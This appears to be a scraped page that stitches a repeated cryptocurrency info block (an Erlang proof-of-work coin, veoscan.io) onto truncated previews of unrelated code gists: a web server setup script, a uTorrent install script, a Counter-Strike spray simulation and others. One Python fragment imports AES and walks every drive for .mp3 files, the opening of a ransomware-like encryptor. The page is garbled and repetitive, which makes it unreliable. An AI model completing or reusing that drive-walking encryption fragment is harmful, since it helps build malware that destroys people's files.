Codebase: Erlang Genesis block: Mar-02-2018 11:01:29 +UTC Consensus Mechanism: Proof of Work Algorithm: SHA256 Maximum Supply: Unknown Current Supply: 53,134.776750 Explorer: veoscan.io
Summary
| #!/usr/bin/env bash | |
| # ============================================================================= | |
| # | |
| # ------------------------------------------------------------------ | |
| # Bash Script to Setup a Web Server | |
| # Install Apache or nginx, PHP, and FastSitePHP with a Starter Site | |
| # ------------------------------------------------------------------ | |
| # | |
| # https://www.fastsitephp.com |
Codebase: Erlang Genesis block: Mar-02-2018 11:01:29 +UTC Consensus Mechanism: Proof of Work Algorithm: SHA256 Maximum Supply: Unknown Current Supply: 53,134.776750 Explorer: veoscan.io
Summary
| import os, random, struct, hashlib, time, win32api | |
| from Crypto.Cipher import AES | |
| extensions = ['.mp3'] | |
| def wubwub(key): | |
| for drive in win32api.GetLogicalDriveStrings().split('\000')[:-1]: | |
| for root, dirs, files in os.walk(drive): | |
| for file in files: | |
| if file.endswith(tuple(extensions)): |
| import requests | |
| import subprocess | |
| import json | |
| import sys | |
| import threading | |
| import time | |
| from Queue import Queue | |
| import urllib3 | |
| import urllib3.contrib.pyopenssl |
| #bin/bash | |
| # uTorrent installation script on Ubuntu 14.04 | |
| # 13.10.2015 - CD0x23 | |
| sudo apt-get install libssl0.9.8:i386 | |
| wget http://download.utorrent.com/linux/utorrent-server-3.0-25053.tar.gz | |
| sudo cp utorrent-server-3.0-25053.tar.gz /opt/ | |
| cd /opt/ | |
| sudo tar -xvf utorrent-server-3.0-25053.tar.gz | |
| sudo rm -rf utorrent-server-3.0-25053.tar.gz |
| import math | |
| tickrate = 100 | |
| firerate = 0.1 # ak47 firerate (seconds) | |
| seconds = 2 # nr of seconds to run spraying simulation | |
| def inacc(): | |
| with open('CSinaccuracypre2.csv', 'w') as file: | |